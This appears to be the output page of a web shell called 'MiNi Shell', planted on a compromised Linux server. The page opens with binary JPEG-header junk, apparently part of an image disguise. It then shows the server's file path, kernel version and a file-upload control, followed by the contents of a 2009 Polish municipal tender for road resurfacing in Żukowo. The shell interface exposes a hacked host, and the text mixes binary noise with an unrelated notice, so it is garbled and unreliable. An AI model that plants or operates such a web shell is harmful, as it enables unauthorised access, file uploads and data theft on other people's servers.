JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090731/262110-N-2009.html

<p class="kh_header"><b>Żukowo: Modernizacja dróg gminnych- nawierzchnia asfaltowa</b><br>
<b>Numer ogłoszenia: 262110 - 2009; data zamieszczenia: 31.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dróg gminnych- nawierzchnia asfaltowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Modernizacja dróg gminnych- nawierzchnia asfaltowa.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Posiadają niezbędną wiedzę  i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia;
1.1)Warunek uważa się za spełniony jeśli w złożonej ofercie Wykonawca  wykaże ., iż dysponuje  (lub będzie dysponować) osobami zdolnymi do realizacji niniejszego zamówienia w tym dla każdej części osobno wykaże: 
Część I :
a) kierownikiem robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest  zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z Dz.U Nr 5 z 2001 r poz 42 ustawa z dnia 15.12.2000 r o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów. 
b) co najmniej 10 pracownikami, którzy będą bezpośrednio  realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp., 
Część II :
a) kierownikiem robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest  zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z Dz.U Nr 5 z 2001 r poz 42 ustawa z dnia 15.12.2000 r o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów. 
b) co najmniej 10 pracownikami, którzy będą bezpośrednio  realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp., 
Część III :
a) kierownikiem robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest  zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z Dz.U Nr 5 z 2001 r poz 42 ustawa z dnia 15.12.2000 r o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów. 
b) co najmniej 10 pracownikami, którzy będą bezpośrednio  realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp., 
Część IV :
a) kierownikiem robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest  zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z Dz.U Nr 5 z 2001 r poz 42 ustawa z dnia 15.12.2000 r o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów. 
b) co najmniej 10 pracownikami, którzy będą bezpośrednio  realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp., 

Wykonawca musi wykazać spełnienie warunku dla każdej części osobno np. w przypadku składania oferty na część I i II wykonawca wykazuje 2 rożnych kierowników robót oraz min 20  pracowników
1.2) wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponujemy potencjałem technicznym niezbędnym do wykonania umowy. Warunek uważa się za spełniony jeśli w ofercie Wykonawca wykaże, iż w ciągu ostatnich pięciu lat (lipiec 2004- lipiec 2009) lub w okresie prowadzenia działalności jeśli  wykonawca działa krócej, był wykonawcą co najmniej:
Część I - był wykonawcą co najmniej 1 roboty drogowych z nawierzchni bitumicznej (roboty typu: budowa modernizacja. remont dróg,) o wartości  min. brutto   110.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.)
 Część II - był wykonawcą co najmniej 1 roboty drogowych z nawierzchni bitumicznej (roboty typu: budowa modernizacja. remont dróg,) o wartości  min. brutto   70.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.)
Część III - był wykonawcą co najmniej 1 roboty drogowych z nawierzchni bitumicznej (roboty typu: budowa modernizacja. remont dróg,) o wartości  min. brutto   190.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.)
Część IV - był wykonawcą co najmniej 1 roboty drogowych z nawierzchni bitumicznej (roboty typu: budowa modernizacja. remont dróg,) o wartości  min. brutto   250.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.) 
Uwaga!
W przypadku składania oferty na więcej niż jedną cześć Wykonawca musi wykazać się doświadczeniem dla każdej  części osobno  czyli wykazać się różnymi robotami drogowymi (wskazane roboty drogowe dla poszczególnych części nie mogą się powtarzać)  lub wykazać się co najmniej  jedną robotą drogową której wartość stanowi sumę min. wymaganej wartości poszczególnych części np. jeśli składa ofertę na część I i II to wykazuje się co najmniej jedną robotą drogową o wartości min. 180.000 zł brutto
2. Wykonawca nie podlega wykluczeniu na podstawie przepisów ustawy prawo zamówień publicznych 
Ocena spełnienia tych warunków odbędzie się na zasadzie spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Oświadczenie oferenta w trybie art. 22 ust. 1 ustawy prawo zamówień publicznych  (OŚWIADCZENIE - ZAŁĄCZNIK NR 3).
2)	Wykaz  personelu odpowiedzialnego za realizację robót - ZAŁĄCZNIK NR 4, z udokumentowaniem ich kwalifikacji zawodowych (kserokopie uprawnień dla osób bezpośrednio odpowiedzialnych za realizację robót - kierownik robót, zaświadczenie o przynależności do właściwej izby samorządów zawodowych
3) Wykaz zrealizowanych w ciągu ostatnich 5 lat robót budowlanych , a jeżeli okres działalności jest krótszy - w tym okresie (ZAŁĄCZNIK NR 6) wraz z dokumentami potwierdzającymi należyte wykonanie tychże zamówień 
4) Wykaz części  zamówień, których wykonanie Wykonawca powierza podwykonawcom (jeżeli oferent przewiduje korzystanie z podwykonawców) - ZAŁĄCZNIK NR 5. W przypadku jeżeli oferent nie będzie korzystał z podwykonawców należy wpisać - nie dotyczy
5)  pisemne zobowiązanie podmiotu udostępniającego swoje osoby zdolne  do wykonania zamówienia - OŚWIADCZENIE ZAŁACZNIK NR 7
6) Wykaz części  zamówień, których wykonanie Zamawiający powierza podwykonawcom (jeżeli oferent przewiduje korzystanie z podwykonawców) - ZAŁĄCZNIK NR 5. W przypadku jeżeli oferent nie będzie korzystał z podwykonawców należy wpisać -nie dotyczy
7)	Oświadczenie oferenta, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 Ustawy prawo zamówień publicznych  (OŚWIADCZENIE - ZAŁĄCZNIK NR 2).
8)	Aktualny dokument (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) dopuszczający oferenta do obrotu prawnego- np. aktualny odpis  z właściwego rejestru albo aktualnego  zaświadczenia o wpisie  do ewidencji działalności gospodarczej itd.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zukowo.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żukowo
ul. Gdańska 52
83-330 Żukowo
pok. 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2009 godzina 12:00, miejsce: Urząd Gminy Żukowo
ul. Gdańska 52
83-330 Żukowo
 pok. 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja drogi gminnej w Czaplach - etap V.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Modernizacja drogi gminnej w Czaplach - etap V 
o długości 180 mb i szerokości 5,5 m.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja drogi gminnej  Widlino - Łapino.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Modernizacja drogi gminnej  Widlino - Łapino 
o długości 180 mb i szerokości 4,5 m ( od miejsca zakończenia płyt Yomb w kierunku wioski).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja drogi  gminnej Krowie Łąki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Modernizacja drogi  gminnej Krowie Łąki 
o długości 290 mb i szerokości 5,5 m.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Modernizacja  drogi gminnej  w Miszewie dz. 66 i 96.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Modernizacja  drogi gminnej  w Miszewie dz. 66 i 96
o długości 324 mb i szerokości 4 i 3,5 m oraz 343 m o szerokości 4,5m.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com